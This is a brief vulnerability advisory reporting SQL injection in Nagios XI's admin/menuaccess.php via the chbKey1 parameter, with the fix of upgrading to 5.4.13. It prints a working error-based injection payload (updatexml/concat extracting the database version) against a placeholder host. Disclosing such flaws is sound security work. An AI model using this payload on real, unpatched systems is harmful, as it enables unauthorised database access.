A SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter.
http://xxxx/nagiosql/admin/menuaccess.php
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1
Upgrade to version 5.4.13